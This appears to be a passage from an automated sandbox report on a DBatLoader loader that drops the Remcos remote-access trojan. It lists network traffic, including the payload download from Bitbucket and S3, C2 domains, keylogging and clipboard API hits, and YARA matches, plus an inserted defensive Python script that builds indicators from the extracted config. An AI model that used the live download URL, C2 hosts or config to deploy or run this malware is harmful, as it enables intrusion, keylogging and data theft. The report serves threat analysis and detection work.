Source: Joe Sandbox View IP Address: 185.166.143.50
Source: Joe Sandbox View ASN Name: RELIABLESITEUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 3.5.30.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 185.166.143.50:443
Source: global traffic HTTP traffic detected:
  GET /masterservicwes/mastermanservices/downloads/165_Dlaybpxloke HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: bitbucket.org
Source: global traffic HTTP traffic detected:
  GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-4b6f-aebd-6df9054b3482/165_Dlaybpxloke?response-content-disposition=attachment%3B%20filename%3D%22165_Dlaybpxloke%22&AWSAccessKeyId=ASIA6KOSE3BNPUMJB2N4&Signature=lPpKAn0ReHQbH3DpienqaxZzNLo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEHIaCXVzLWVhc3QtMSJIMEYCIQCaZkGDFyxBoRgAK4dmP5GUp0SY87BURv7X14RQrwEcZgIhAMetywssY5BhL8pY%2FtG26ZU6vERKuy%2FAVKUuXoBcCnK1KqcCCCsQABoMOTg0NTI1MTAxMTQ2IgyUI9V0VJ8H5yjEvdkqhALsEBIC2rYjECe9FxMRnaue0tWUjriw4Hncuptkdwv33JFaLSq5PAcZ7j0wHx5XTplvXQu0B%2BAVF%2BA7w7OoltUA9YEMD1dli4GhwmLw98H7TnsbJxv%2FAfH5jmYjDgNSeefRwq6dAL84iBBiGO%2BTcrZRP0bRK0UmrAMflcU24c9z1OpZvZUoh8xhJivA3GqRpKweY6B3FcJAT%2FE3nJCW9heW4uO%2FwIjWxMnZfhnXKm8yFawEBgORWNzIvaslhtOM4sRJxbEPTznZKwjZYmaP1oFmi66IfRK6h10tQ%2Ffh58rfDiVaxxUtMhmVces3NbVCtUDHXTZO01oYfFXpzFfw1Iokuk5LEzCjksu6BjqcARY%2FAHp8g2KBhslGF9Frk4I8oled3sypm%2FnQFVM%2BPCh2Z44y5IQLfMLnMkgcML2U3jqY%2F2%2BStuIb%2BFoD99teigmj8%2BuaolR%2BMXe%2FGwZ7UgMk%2FRQdZKpZro%2F6dfGCGZytk7EGcfIrQ5l%2F7x%2BltpFGD%2F65w%2BoCYBUwnHQOgiJLucLeN8XglIkhzkhQFYiFvroeURjDmWQBwBq5NvFGgQ%3D%3D&Expires=1733480491 HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: bbuseruploads.s3.amazonaws.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029460F7 recv, 6_2_029460F7
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: zara.master-workdone.com.ua
Source: global traffic DNS traffic detected: DNS query: manazara.master-workdone.com.ua
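The configuration extracted in the AV Detection section and the Suricata alerts above carry the same story from two angles: the Remcos config names two C2 hosts on port 5874, and every severity-1 JA3 alert goes to 104.243.42.254:5874. The script below turns both into a structured IOC set and checks that they agree. It is an added example, not part of the Joe Sandbox report; the dictionaries and alert strings are transcribed from the report, nothing is fetched, and the way the "Install flag" gates the Run-key settings is Remcos's documented behaviour rather than something this report demonstrates.

```python
"""Build an IOC set from the DBatLoader and Remcos configurations this
report extracted and corroborate it against the Suricata alert lines.
Added example, not report code; all inputs are transcribed constants."""
import re
from dataclasses import dataclass, field

REMCOS_CONFIG = {  # subset of the "Malware Configuration Extractor: Remcos" line
    "Host:Port:Password": ["zara.master-workdone.com.ua:5874:1",
                           "manazara.master-workdone.com.ua:5874:1"],
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Copy folder": "Remcos",
    "Copy file": "remcos.exe",
    "Mutex": "Rmc-RX8VCL",
    "Keylog file": "logs.dat",
}
DBATLOADER_CONFIG = {
    "Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"],
}
SURICATA_ALERTS = [  # three of the alert lines from the Networking section
    "2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49730 -> 104.243.42.254:5874",
    "2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49785 -> 104.243.42.254:5874",
    "2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 185.166.143.50:443",
]
FLOW_RE = re.compile(r"^(\d+) - Severity (\d) - (.+?) : (\S+):(\d+) -> (\S+):(\d+)$")


@dataclass
class C2Entry:
    host: str
    port: int
    password: str  # the Remcos "password" field; operator-chosen, here "1"


@dataclass
class IocSet:
    c2: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    mutexes: list = field(default_factory=list)
    install_artifacts: list = field(default_factory=list)
    c2_flows: dict = field(default_factory=dict)  # dst ip -> set of dst ports


def parse_c2(entry: str) -> C2Entry:
    # Each entry is host:port:password; rsplit keeps any ':' inside the host.
    host, port, password = entry.rsplit(":", 2)
    return C2Entry(host, int(port), password)


def build_iocs(remcos_cfg, loader_cfg, alerts) -> IocSet:
    iocs = IocSet()
    iocs.c2 = [parse_c2(e) for e in remcos_cfg["Host:Port:Password"]]
    iocs.urls = list(loader_cfg["Download Url"])
    iocs.mutexes = [remcos_cfg["Mutex"]]
    # The Setup HKCU/HKLM Run flags only apply when the implant installs
    # itself; with "Install flag" disabled (as here) Remcos neither copies
    # remcos.exe nor writes its own Run value, so no artifacts are expected.
    if remcos_cfg.get("Install flag") == "Enable":
        path = remcos_cfg["Copy folder"] + "\\" + remcos_cfg["Copy file"]
        iocs.install_artifacts.append(path)
        for hive in ("HKCU", "HKLM"):
            if remcos_cfg.get(f"Setup {hive}\\Run") == "Enable":
                iocs.install_artifacts.append(f"{hive} CurrentVersion\\Run value -> {path}")
    for line in alerts:
        m = FLOW_RE.match(line)
        if m and int(m.group(2)) == 1:  # severity 1 only: the Remcos JA3 hits
            iocs.c2_flows.setdefault(m.group(6), set()).add(int(m.group(7)))
    return iocs


def c2_port_corroborated(iocs: IocSet) -> bool:
    """True when every high-severity flow used a port named in the config."""
    configured = {e.port for e in iocs.c2}
    return bool(iocs.c2_flows) and all(ports <= configured for ports in iocs.c2_flows.values())


if __name__ == "__main__":
    iocs = build_iocs(REMCOS_CONFIG, DBATLOADER_CONFIG, SURICATA_ALERTS)
    for e in iocs.c2:
        print(f"C2 {e.host}:{e.port} password={e.password!r}")
    print("download URL:", iocs.urls[0])
    print("observed C2 flows:", iocs.c2_flows)
    print("port corroborated by traffic:", c2_port_corroborated(iocs))
```

The report does not print the DNS answers for the two C2 names, so the IP is tied to the config by port only; a resolver log or the PCAP closes that gap. The "New RUN Key Pointing to Suspicious Folder" Sigma hit therefore belongs to the loader's drop (C:\Users\Public\Libraries\Dlaybpxl.PIF), not to a Remcos self-install.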
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: jW3NEKvxH1.exe, 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, SndVol.exe, 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: jW3NEKvxH1.exe, jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-63c3-
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/2601acd3-6
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000819000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/ma
Source: jW3NEKvxH1.exe, 00000000.00000002.2265349899.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000002.2265349899.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmp, jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: jW3NEKvxH1.exe, 00000000.00000003.2249773690.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.3:443 -> 192.168.2.6:49718 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029299E4 SetWindowsHookExA 0000000D,029299D0,00000000 6_2_029299E4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_02935A45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_029359C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_029359C6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_029559C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 19_2_029559C6
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02935A45 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_2_02935A45
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02929B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 6_2_02929B10
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2435347353.0000000021D67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2511848182.0000000033ED0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293BB77 SystemParametersInfoW, 6_2_0293BB77
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_0295BB77 SystemParametersInfoW, 19_2_0295BB77

System Summary

Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
